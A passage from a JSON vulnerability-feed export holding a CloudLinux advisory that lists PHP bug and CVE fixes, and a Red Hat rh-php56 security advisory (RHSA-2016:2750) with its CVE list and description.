element\n- Fix bug #67587: Redirection loop on nginx with FPM\n- Fix bug #71465: PHAR doesn't know about litespeed\n- Fix bug #73737: FPE when parsing a tag format\n- Fix bug #73868: Fix DOS vulnerability in gdImageCreateFromGd2Ctx()\n- Fix bug #73869: Signed Integer Overflow gd_io.c\n- Fix bug #73773: Seg fault when loading hostile phar\n- Fix bug #70436: Use After Free Vulnerability in unserialize()\n- Fix bug #74603: PHP INI Parsing Stack Buffer Overflow Vulnerability\n- Fix bug #72535: arcfour encryption stream filter crashes php\n- Fix bug #72434: ZipArchive class Use After Free Vulnerability in PHP's\n GC algorithm and unseria\n- Fix bug #72455: Heap Overflow due to integer overflows\n- Fix bug #74782: Reflected XSS in .phar 404 page\n- Fix bug #71335: Type Confusion in WDDX Packet Deserialization\n- Fix bug #76130: Heap Buffer Overflow (READ: 1786) in exif_iif_add_value\n- Fix bug #76249: stream filter convert.iconv leads to infinite loop on\n invalid sequence\n- Fix bug #76248: Malicious LDAP-Server Response causes Crash\n- Fix bug #76129: fix for CVE-2018-5712 may not be complete\n- Fix bug #75981: stack-buffer-overflow while parsing HTTP response\n- Fix bug #74385: Locale::parseLocale() broken with some arguments\n- Fix bug #76335: "link(): Bad file descriptor" with non-ASCII path\n- Fix bug #76383: array_map on $GLOBALS returns IS_INDIRECT\n- Fix bug #73342: Vulnerability in php-fpm by changing stdin to non-blocking\n- Fix bug #76505: array_merge_recursive() is duplicating sub-array keys\n- Fix bug #76532: Integer overflow and excessive memory usage in mb_strimwidth\n- Fix bug #76548: pg_fetch_result did not fetch the next row\n- Fix bug #76488: Memory leak when fetching a BLOB field\n- Fix bug #76665: SQLite3Stmt::bindValue() with SQLITE3_FLOAT doesn't juggle\n- Fix bug #75402: Possible Memory Leak using PDO::CURSOR_SCROLL option\n- Fix bug #76517: --with-gettext= causes configure to misjudges there is no getcwd\n- Fix bug #72443: Installing shared 
extensions: cp: cannot stat 'modules/*':\n No such file or dire\n- Fix bug #68175: RegexIterator pregFlags are NULL instead of 0\n- Fix bug #55146: iconv_mime_decode_headers() skips some headers\n- Fix bug #63839: iconv_mime_decode_headers function is skipping headers\n- Fix bug #60494: iconv_mime_decode does ignore special characters\n- Fix bug #68180: iconv_mime_decode can return extra characters in a header\n- Fix bug #73457: Wrong error message when fopen FTP wrapped fails to open\n data connection\n- Fix bug #74454: Wrong exception being thrown when using ReflectionMethod\n- Fix bug #74764: Bindto IPv6 works with file_get_contents but fails with\n stream_socket_client\n- Fix bug #75273: php_zlib_inflate_filter() may not update bytes_consumed\n- Fix bug #75696: posix_getgrnam fails to print details of group\n- Fix bug #76480: Use curl_multi_wait() so that timeouts are respected\n- Fix bug #76800: foreach inconsistent if array modified during loop\n- Fix bug #76886: Can't build xmlrpc with expat\n- Fix bug #76901: method_exists on SPL iterator passthrough method corrupts memory\n- Fix bug #77242: heap out of bounds read in xmlrpc_decode()\n- Fix bug #77247: heap buffer overflow in phar_detect_phar_fname_ext\n- Fix bug #77270: imagecolormatch Out Of Bounds Write on Heap\n- Fix bug #77370: Buffer overflow on mb regex functions - fetch_token\n- Fix bug #77380: Global out of bounds read in xmlrpc base64 code\n- Fix bug #77630: rename() across the device may allow unwanted access\n during processing\n- Fix bug #77494: Disabling class causes segfault on member access\n- Fix bug #77431: openFile() silently truncates after a null byte\n- Fix bug #51068: DirectoryIterator glob:// don't support current path\n relative queries\n- Fix bug #77396: Null Pointer Dereference in phar_create_or_parse_filename\n- Fix bug #77540: Invalid Read on exif_process_SOFn\n- Fix bug #77390: feof might hang on TLS streams in case of fragmented TLS records\n- Fix bug #77586: 
phar_tar_writeheaders_int() buffer overflow\n- Fix bug #77546: iptcembed broken function\n- Fix bug #77563: Uninitialized read in exif_process_IFD_in_MAKERNOTE\n- Fix bug #76557: heap-buffer-overflow (READ of size 48) while reading exif data\n- Fix bug #77024: SplFileObject::__toString() may return array\n- Fix bug #77945: Segmentation fault when constructing SoapClient with WSDL_CACHE_BOTH\n- Fix bug #77697: Crash on Big_Endian platform\n- Fix bug #77943: imageantialias($image, false); does not work\n- Fix bug #77944: Wrong meta pdo_type for bigint on LLP64\n- Fix bug #76717: var_export() does not create a parsable value for PHP_INT_MIN\n- Fix bug #77921: static.php.net doesn't work anymore\n- Fix bug #77934: php-fpm kill -USR2 not working\n- Fix bug #77700: Writing truecolor images as GIF ignores interlace flag\n- Fix bug #77765: FTP stream wrapper should set the directory as executable\n- Fix bug #50020: DateInterval:createDateFromString() silently fails\n- Fix bug #77742: bcpow() implementation related to gcc compiler optimization\n- Fix bug #77967: Bypassing open_basedir restrictions via file uris\n- Fix bug #77973: Uninitialized read in gdImageCreateFromXbm\n- Fix bug #77988: heap-buffer-overflow on php_jpg_get16\n- Fix bug #78192: SegFault when reuse statement after schema has changed\n- Fix bug #77124: FTP with SSL memory leak\n- Fix bug #78256: heap-buffer-overflow on exif_process_user_comment\n- Fix bug #78222: heap-buffer-overflow on exif_scan_thumbnail\n- Fix bug #77946: Bad cURL resources returned by curl_multi_info_read()\n- Fix bug #78333: Exif crash (bus error) due to wrong alignment and invalid cast\n- Fix bug #69100: Bus error from stream_copy_to_stream (file -> SSL stream)\n with invalid length\n- Fix bug #76342: file_get_contents waits twice specified timeout\n- Fix bug #76859: stream_get_line skips data if used with data-generating filter\n- Fix bug #78579: mb_decode_numericentity: args number inconsistency\n- Fix bug #78910: 
Heap-buffer-overflow READ in exif\n- Fix bug #78878: Buffer underflow in bc_shift_addsub\n- Fix bug #78793: Use-after-free in exif parsing under memory sanitizer\n- Fix bug #78863: DirectoryIterator class silently truncates after a null byte\n- Fix bug #79099: OOB read in php_strip_tags_ex\n- Fix bug #79082: Files added to tar with Phar::buildFromIterator have\n all-access permissions\n- Fix bug #79329: get_headers() silently truncates after a null byte\n- Fix bug #79282: Use-of-uninitialized-value in exif\n- Fix bug #61597: SimpleXMLElement doesn't include both @attributes and\n textContent in properties\n- Fix bug #74940: DateTimeZone loose comparison always true until properties\n are initialized.\n- Fix bug #79296: ZipArchive::open fails on empty file (libzip 1.6.0)\n- Fix bug #79330: shell_exec() silently truncates after a null byte\n- Fix bug #79364: When copy empty array, next key is unspecified.\n- Fix bug #79396: DateTime hour incorrect during DST jump forward using setTime\n- Fix bug #79410: system() swallows last chunk if it is exactly 4095 bytes\n without newline\n- Fix bug #79424: php_zip_glob uses gl_pathc after call to globfree\n- Fix bug #79465: OOB Read in urldecode() (CVE-2020-7067)\n- Fix bug #78221: DOMNode::normalize() doesn't remove empty text nodes\n- Fix bug #78875: Long filenames cause OOM and temp files are not cleaned\n (CVE-2019-11048)\n- Fix bug #78876: Long variables in multipart/form-data cause OOM and temp\n files are not cleaned (CVE-2019-11048)\n- Fix bug #79514: Memory leaks while including unexistent file\n- Fix bug #79528: Different object of the same xml between 7.4.5 and 7.4.4\n- Fix bug #62890: default_socket_timeout=-1 causes connection to timeout\n- Fix bug #70362: Can't copy() large 'data://' with open_basedir\n- Fix bug #73527: Invalid memory access in php_filter_strip\n- Fix bug #74267: segfault with streams and invalid data\n- Fix bug #79787: mb_strimwidth does not trim string\n- Fix bug #79877: getimagesize function 
silently truncates after a null byte\n- Fix bug #68447: grapheme_extract take an extra trailing character\n- Fix bug #68825: Inconsistent exception in DirectoryIterator::getLinkTarget()\n- Fix bug #74145: wddx parsing empty boolean tag leads to SIGSEGV (CVE-2017-11143)\n- Fix bug #74651: negative-size-param (-1) in memcpy in zif_openssl_seal()\n (CVE-2017-11144)\n- Fix bug #74435: Buffer over-read into uninitialized memory (CVE-2017-7890)\n- Fix bug #73093: Unserialize Exception object can lead to infinite loop\n (CVE-2016-7478)\n- Fix bug #72520: Stack-based buffer overflow vulnerability in php_stream_zip_opener\n (CVE-2016-6297)\n- Fix bug #73825: Heap out of bounds read on unserialize in finish_nested_data()\n (CVE-2016-10161)\n- Fix bug #60491: Session module is adoptive (CVE-2011-4718)\n- Fix bug #69253: ZIP Integer Overflow leads to writing past heap boundary\n (CVE-2015-2331)\n- Fix bug #69418: CVE-2006-7243 fix regressions in 5.4+ (CVE-2015-4025)\n- Fix bug #68598: pcntl_exec() should not allow null char (CVE-2015-4026)\n- Fix bug #69207: move_uploaded_file allows nulls in path (CVE-2015-2348)\n- Fix bug #69218: potential remote code execution with apache 2.4 apache2handler\n (CVE-2015-3330)\n- Fix bug #69719: Incorrect handling of paths with NULs, related to bug 69353\n (CVE-2015-4598)\n- Fix bug #69353: Missing null byte checks for paths in various PHP extensions\n (CVE-2015-3411)\n- Fix bugs #70168, #70169, #70166, #70155: Use After Free Vulnerability in\n unserialize() with\n SplObjectStorage, SplDoublyLinkedList, SPLArrayObject, SPLArrayObject (CVE-2015-6831)\n- Fix bug #70019: Files extracted from archive may be placed outside of\n destination directory (CVE-2015-6833)\n- Fix bug #70388: SOAP serialize_function_call() type confusion / RCE (CVE-2015-6836)\n- Fix bug #69782: NULL pointer dereference (CVE-2015-6837, CVE-2015-6838)\n- Fix bug #70433: Uninitialized pointer in phar_make_dirstream when zip entry\n filename is \"/\" (CVE-2015-7804)\n- Fix bug 
#69923: Buffer overflow and stack smashing error in phar_fix_filepath\n (CVE-2015-5590)\n- Fix bug #71488: Stack overflow when decompressing tar archives (CVE-2016-2554)\n- Fix bug #72061: Out-of-bounds reads in zif_grapheme_stripos with negative offset\n (CVE-2016-4541, CVE-2016-4540)\n- Fix bug #72094: Out of bounds heap read access in exif header processing\n (CVE-2016-4542)\n- Fix bug #72093: bcpowmod accepts negative scale and corrupts _one_ definition\n (CVE-2016-4537)\n- Fix bug #71331: Uninitialized pointer in phar_make_dirstream() (CVE-2016-4343)\n- Fix bug #72241: get_icu_value_internal out-of-bounds read (CVE-2016-5093)\n- Fix bug #72135: Integer Overflow in php_html_entities() (CVE-2016-5094)\n- Fix bug #72114: Integer underflow / arbitrary null write in fread/gzread\n (CVE-2016-5096)\n- Fix bug #72339: Integer Overflow in _gd2GetHeader() resulting in heap overflow\n (CVE-2016-5766)\n- Fix bug #72340: Double Free Courruption in wddx_deserialize (CVE-2016-5772)\n- Fix bug #72613: Inadequate error handling in bzread() (CVE-2016-5399)\n- Fix bug #70480: php_url_parse_ex() buffer overflow read (CVE-2016-6288)\n- Fix bug #72513: Stack-based buffer overflow vulnerability in virtual_file_ex\n (CVE-2016-6289)\n- Fix bug #72562: Use After Free in unserialize() with Unexpected Session\n Deserialization (CVE-2016-6290)\n- Fix bug #72603: Out of bound read in exif_process_IFD_in_MAKERNOTE (CVE-2016-6291)\n- Fix bug #72533: locale_accept_from_http out-of-bounds access (CVE-2016-6294)\n- Fix bug #69975: PHP segfaults when accessing nvarchar(max) defined columns\n (CVE-2015-8879)\n- Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c\n (CVE-2016-6296)\n- Fix bug #72293: Heap overflow in mysqlnd related to BIT fields (CVE-2016-7412)\n- Fix bug #72860: wddx_deserialize use-after-free (CVE-2016-7413)\n- Fix bug #72928: Out of bound when verify signature of zip phar in phar_parse_zipfile\n (CVE-2016-7414)\n- Fix bug #73007: SEH buffer overflow 
msgfmt_format_message (CVE-2016-7416)\n- Fix bug #73029: Missing type check when unserializing SplArray (CVE-2016-7417)\n- Fix bug #73065: Out-Of-Bounds Read in php_wddx_push_element of wddx.c (CVE-2016-7418)\n- Fix bug #73280: Stack Buffer Overflow in GD dynamicGetbuf (CVE-2016-8670)\n- Fix bug #73764: Crash while loading hostile phar archive (CVE-2016-10159)\n- Fix bug #73768: Memory corruption when loading hostile phar (CVE-2016-10160)\n- Fix bug #72627: Memory Leakage In exif_process_IFD_in_TIFF (CVE-2016-7128)\n- Fix bug #70350: ZipArchive::extractTo allows for directory traversal when\n creating directories (CVE-2014-9767)\n- Fix bug #70081: SoapClient info leak / null pointer dereference via multiple\n type confusions (CVE-2015-8835)\n- Fix bug #70121: unserialize() could lead to unexpected methods execution / NULL\n pointer deref (CVE-2015-8876)\n- Fix bug #71906: AddressSanitizer: negative-size-param (-1) in mbfl_strcut\n (CVE-2016-4073)\n- Fix bug #70014: openssl_random_pseudo_bytes() is not cryptographically secure\n (CVE-2015-8867)\n- Fix bug #77371: heap buffer overflow in mb regex functions - compile_string_node\n (CVE-2019-9023)\n- Fix bug #77381: heap buffer overflow in multibyte match_at (CVE-2019-9023)\n- Fix bug #77382: heap buffer overflow due to incorrect length in expand_case_fold_string\n (CVE-2019-9023)\n- Fix bug #77385: buffer overflow in fetch_token (CVE-2019-9023)\n- Fix bug #77394: Buffer overflow in multibyte case folding - unicode (CVE-2019-9023)\n- Fix vulnerabilities with oniguruma: CVE-2017-9226, CVE-2017-9224, CVE-2017-9227,\n CVE-2017-9228, CVE-2019-13224\n- Fix general vulneravilities: CVE-2014-9653, CVE-2015-0235, CVE-2015-3152,\n CVE-2016-3074\n- Fix bug #79699: PHP parses encoded cookie names so malicious `__Host-` cookies\n can be sent (CVE-2020-7070)\n- Fix bug #80007: Potential type confusion in unixtojd() parameter parsing", "modified": "2020-10-15T12:00:00", "published": "2020-10-15T12:00:00", "id": 
"CLSA-2020:1605798462", "href": "https://repo.cloudlinux.com/centos6-els/updateinfo.xml", "type": "cloudlinux", "title": "Fix of 227 CVE", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-12-11T13:32:46", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7456", "CVE-2014-9767", "CVE-2015-2325", "CVE-2015-2326", "CVE-2015-2327", "CVE-2015-2328", "CVE-2015-3210", "CVE-2015-3217", "CVE-2015-5073", "CVE-2015-8381", "CVE-2015-8383", "CVE-2015-8384", "CVE-2015-8385", "CVE-2015-8386", "CVE-2015-8388", "CVE-2015-8391", "CVE-2015-8392", "CVE-2015-8395", "CVE-2015-8835", "CVE-2015-8865", "CVE-2015-8866", "CVE-2015-8867", "CVE-2015-8873", "CVE-2015-8874", "CVE-2015-8876", "CVE-2015-8877", "CVE-2015-8879", "CVE-2015-8935", "CVE-2016-1903", "CVE-2016-2554", "CVE-2016-3074", "CVE-2016-3141", "CVE-2016-3142", "CVE-2016-4070", "CVE-2016-4071", "CVE-2016-4072", "CVE-2016-4073", "CVE-2016-4342", "CVE-2016-4343", "CVE-2016-4473", "CVE-2016-4537", "CVE-2016-4538", "CVE-2016-4539", "CVE-2016-4540", "CVE-2016-4541", "CVE-2016-4542", "CVE-2016-4543", "CVE-2016-4544", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5096", "CVE-2016-5114", "CVE-2016-5399", "CVE-2016-5766", "CVE-2016-5767", "CVE-2016-5768", "CVE-2016-5770", "CVE-2016-5771", "CVE-2016-5772", "CVE-2016-5773", "CVE-2016-6128", "CVE-2016-6207", "CVE-2016-6288", "CVE-2016-6289", "CVE-2016-6290", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6294", "CVE-2016-6295", "CVE-2016-6296", "CVE-2016-6297", "CVE-2016-7124", "CVE-2016-7125", "CVE-2016-7126", "CVE-2016-7127", "CVE-2016-7128", "CVE-2016-7129", "CVE-2016-7130", "CVE-2016-7131", "CVE-2016-7132"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. The rh-php56 packages provide a recent stable release of PHP with PEAR 1.9.5 and enhanced language features including constant expressions, variadic functions, arguments unpacking, and the interactive debuger. 
The memcache, mongo, and XDebug extensions are also included.\n\nThe rh-php56 Software Collection has been upgraded to version 5.6.25, which provides a number of bug fixes and enhancements over the previous version. (BZ#1356157, BZ#1365401)\n\nSecurity Fixes in the rh-php56-php component:\n\n* Several Moderate and Low impact security issues were found in PHP. Under certain circumstances, these issues could cause PHP to crash, disclose portions of its memory, execute arbitrary code, or impact PHP application integrity. Space precludes documenting each of these issues in this advisory. Refer to the CVE links in the References section for a description of each of these vulnerabilities. (CVE-2013-7456, CVE-2014-9767, CVE-2015-8835, CVE-2015-8865, CVE-2015-8866, CVE-2015-8867, CVE-2015-8873, CVE-2015-8874, CVE-2015-8876, CVE-2015-8877, CVE-2015-8879, CVE-2016-1903, CVE-2016-2554, CVE-2016-3074, CVE-2016-3141, CVE-2016-3142, CVE-2016-4070, CVE-2016-4071, CVE-2016-4072, CVE-2016-4073, CVE-2016-4342, CVE-2016-4343, CVE-2016-4473, CVE-2016-4537, CVE-2016-4538, CVE-2016-4539, CVE-2016-4540, CVE-2016-4541, CVE-2016-4542, CVE-2016-4543, CVE-2016-4544, CVE-2016-5093, CVE-2016-5094, CVE-2016-5096, CVE-2016-5114, CVE-2016-5399, CVE-2016-5766, CVE-2016-5767, CVE-2016-5768, CVE-2016-5770, CVE-2016-5771, CVE-2016-5772, CVE-2016-5773, CVE-2016-6128, CVE-2016-6207, CVE-2016-6288, CVE-2016-6289, CVE-2016-6290, CVE-2016-6291, CVE-2016-6292, CVE-2016-6294, CVE-2016-6295, CVE-2016-6296, CVE-2016-6297, CVE-2016-7124, CVE-2016-7125, CVE-2016-7126, CVE-2016-7127, CVE-2016-7128, CVE-2016-7129, CVE-2016-7130, CVE-2016-7131, CVE-2016-7132)\n\n* Multiple flaws were found in the PCRE library included with the rh-php56-php packages for Red Hat Enterprise Linux 6. A specially crafted regular expression could cause PHP to crash or, possibly, execute arbitrary code. 
(CVE-2015-2325, CVE-2015-2326, CVE-2015-2327, CVE-2015-2328, CVE-2015-3210, CVE-2015-3217, CVE-2015-5073, CVE-2015-8381, CVE-2015-8383, CVE-2015-8384, CVE-2015-8385, CVE-2015-8386, CVE-2015-8388, CVE-2015-8391, CVE-2015-8392, CVE-2015-8395)\n\nRed Hat would like to thank Hans Jerry Illikainen for reporting CVE-2016-3074, CVE-2016-4473, and CVE-2016-5399.", "modified": "2018-06-13T01:28:23", "published": "2016-11-15T16:13:31", "id": "RHSA-2016:2750", "href": "https://access.redhat.com/errata/RHSA-2016:2750", "type": "redhat", "title": "(RHSA-2016:2750) Moderate: rh-php56 security, bug fix, and enhancement update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}